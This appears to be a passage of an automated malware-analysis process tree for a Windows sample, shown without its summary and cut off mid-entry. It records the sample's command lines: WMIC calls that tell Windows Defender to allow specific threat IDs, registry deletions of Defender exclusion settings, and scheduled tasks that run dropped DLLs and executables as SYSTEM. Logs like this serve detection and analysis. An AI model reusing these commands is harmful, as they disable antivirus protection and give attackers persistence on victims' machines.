                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:17128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:17268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:17568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:16592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:17624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:18216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:17180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:14656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:18088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:18576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:18528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:13472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:12156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "bEwGusBEGbIeKSSfjR"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:18276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:18416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:18492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:18552
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:18824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TdgVoScrU\eBdHDq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xSbgDCImQNdWYmB" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "xSbgDCImQNdWYmB2" /F /xml "C:\Program Files (x86)\TdgVoScrU\XWmwawu.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /END /TN "xSbgDCImQNdWYmB"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11876
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "xSbgDCImQNdWYmB"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "FzvIgGdeRLcgbM" /F /xml "C:\Program Files (x86)\xmhVlMznYVRU2\SCroPrS.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "rRYXbmmYjIvrG2" /F /xml "C:\ProgramData\mrnDKDtAoCXFymVB\lEUnNru.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "DVpMShOGhTVXDiVCZ2" /F /xml "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\dXZipRN.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "LdVsjAprHUXUOtSHAnG2" /F /xml "C:\Program Files (x86)\FAROrqqmwDJuC\rzJfHCg.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "lDWDrPZYJQBuPmKYQ" /SC once /ST 12:26:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\XiOEFUDs\hZTBWZO.dll\",#1 /site_id 668658" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:13200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /run /I /tn "lDWDrPZYJQBuPmKYQ"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "spummIlXAdpq" /SC once /ST 19:28:51 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\zGfATNLg\NYaOvet.exe\" RA /S"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:17252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /run /I /tn "spummIlXAdpq"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:13620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\USNydSz.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\USNydSz.exe 4h /site_id 668658 /S
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:12068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:19048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10424
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:15296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8524
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:14612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:16716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:18048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
